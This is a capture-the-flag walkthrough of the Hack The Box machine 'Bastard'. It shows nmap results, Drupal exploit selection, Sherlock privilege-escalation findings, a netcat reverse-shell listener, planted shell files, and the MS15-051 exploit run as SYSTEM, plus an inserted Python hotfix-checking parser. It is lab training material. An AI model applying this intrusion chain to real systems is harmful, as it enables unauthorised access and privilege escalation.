Bastard HTB — WalkThrough

Initial Scans

# Nmap 7.80 scan initiated Sun Aug 16 20:40:16 2020 as: nmap -sC -sV -oA initial 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.043s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 16 20:41:23 2020 -- 1 IP address (1 host up) scanned in 67.34 seconds

Finding Exploits

ambionics

Modifying The Exploit

I couldn’t get the formatting to stay correct in the code box, sorry :)
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46 ££
System Boot Time: 23/8/2020, 7:02:03 §£
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.582 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.604 MB
Virtual Memory: In Use: 491 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9
python -m SimpleHTTPServer

Enumeration Through the User Shell

Title : Task Scheduler .XML
MSBulletin : MS10-092
CVEID : 2010-3338, 2010-3888
Link : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable
Title : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID : 2015-1701, 2015-2433
Link : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable
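As an added example (not part of the original write-up), a small Python parser for the systeminfo output shown above: it pulls out the OS build and the hotfix list and reports which of the bulletins Sherlock flagged have no matching KB installed, treating "Hotfix(s): N/A" as "nothing applied". The two samples are constructed, and the bulletin-to-KB mapping is an assumption to verify against the Microsoft bulletin pages.

```python
import re

# Constructed sample in the shape of the systeminfo output shown above (only the
# fields this check needs; not the box's full output).
SAMPLE_UNPATCHED = """Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
Hotfix(s):                 N/A
"""

# Constructed sample of the other form systeminfo produces: a count followed by
# indented "[nn]: KBxxxxxx" continuation lines.
SAMPLE_PATCHED = """Host Name:                 PATCHED
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB976932
                           [02]: KB3045171
"""

# Bulletin -> KB mapping for the two findings Sherlock reported above. The KB
# numbers are assumed (from memory); confirm them on the Microsoft bulletin pages.
BULLETIN_KB = {"MS10-092": "KB2305420", "MS15-051": "KB3045171"}


def parse_systeminfo(text):
    """Parse systeminfo output into {field: value}; "[nn]: x" continuation
    lines are collected as a list under "<field> list"."""
    fields, current = {}, None
    for line in text.splitlines():
        if current and line.lstrip().startswith("["):
            fields.setdefault(current + " list", []).append(line.split(":", 1)[1].strip())
            continue
        m = re.match(r"^(\S[^:]*):\s*(.*)$", line)
        if m:
            current = m.group(1).strip()
            fields[current] = m.group(2).strip()
    return fields


def installed_hotfixes(info):
    """KBs listed under Hotfix(s); [] when the field reads N/A (nothing applied)."""
    if info.get("Hotfix(s)", "N/A").startswith("N/A"):
        return []
    return info.get("Hotfix(s) list", [])


def missing_bulletins(info, bulletins=BULLETIN_KB):
    """Bulletins whose KB is absent from the host's hotfix list, sorted."""
    have = set(installed_hotfixes(info))
    return sorted(b for b, kb in bulletins.items() if kb not in have)
```

Run it against a saved `systeminfo` capture to get the same "missing bulletin" triage Sherlock performs, with the N/A case flagged as every bulletin outstanding.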
Github
kali@kali:~$ nc -nlvp 8080
listening on [any] 8080 ...
connect to [10.10.14.36] from (UNKNOWN) [10.10.10.9] 49186
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\inetpub\drupal-7.54
24/08/2020 02:31 �� <DIR> .
24/08/2020 02:31 �� <DIR> ..
19/03/2017 01:42 �� 317 .editorconfig
19/03/2017 01:42 �� 174 .gitignore
19/03/2017 01:42 �� 5.969 .htaccess
19/03/2017 01:42 �� 6.604 authorize.php
19/03/2017 01:42 �� 110.781 CHANGELOG.txt
19/03/2017 01:42 �� 1.481 COPYRIGHT.txt
19/03/2017 01:42 �� 720 cron.php
19/03/2017 01:43 �� <DIR> includes
19/03/2017 01:42 �� 529 index.php
19/03/2017 01:42 �� 1.717 INSTALL.mysql.txt
19/03/2017 01:42 �� 1.874 INSTALL.pgsql.txt
19/03/2017 01:42 �� 703 install.php
19/03/2017 01:42 �� 1.298 INSTALL.sqlite.txt
19/03/2017 01:42 �� 17.995 INSTALL.txt
19/03/2017 01:42 �� 18.092 LICENSE.txt
19/03/2017 01:42 �� 8.710 MAINTAINERS.txt
19/03/2017 01:43 �� <DIR> misc
19/03/2017 01:43 �� <DIR> modules
24/08/2020 02:31 �� 55.296 ms15-051x64.exe
24/08/2020 01:16 �� 43.696 nc64.exe
19/03/2017 01:43 �� <DIR> profiles
19/03/2017 01:42 �� 5.382 README.txt
19/03/2017 01:42 �� 2.189 robots.txt
24/08/2020 01:26 �� 272 s4u.php
19/03/2017 01:43 �� <DIR> scripts
24/08/2020 01:04 �� 266 shell.php
19/03/2017 01:43 �� <DIR> sites
19/03/2017 01:43 �� <DIR> themes
19/03/2017 01:42 �� 19.986 update.php
19/03/2017 01:42 �� 10.123 UPGRADE.txt
19/03/2017 01:42 �� 2.200 web.config
19/03/2017 01:42 �� 417 xmlrpc.php
25 File(s) 316.791 bytes
9 Dir(s) 30.807.846.912 bytes free
C:\inetpub\drupal-7.54>ms15-051x64.exe whoami
ms15-051x64.exe whoami
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 868 created.
==============================
nt authority\system
C:\inetpub\drupal-7.54>


Follow along as I post CTF write-ups in preparation for the OSCP!

Max Register
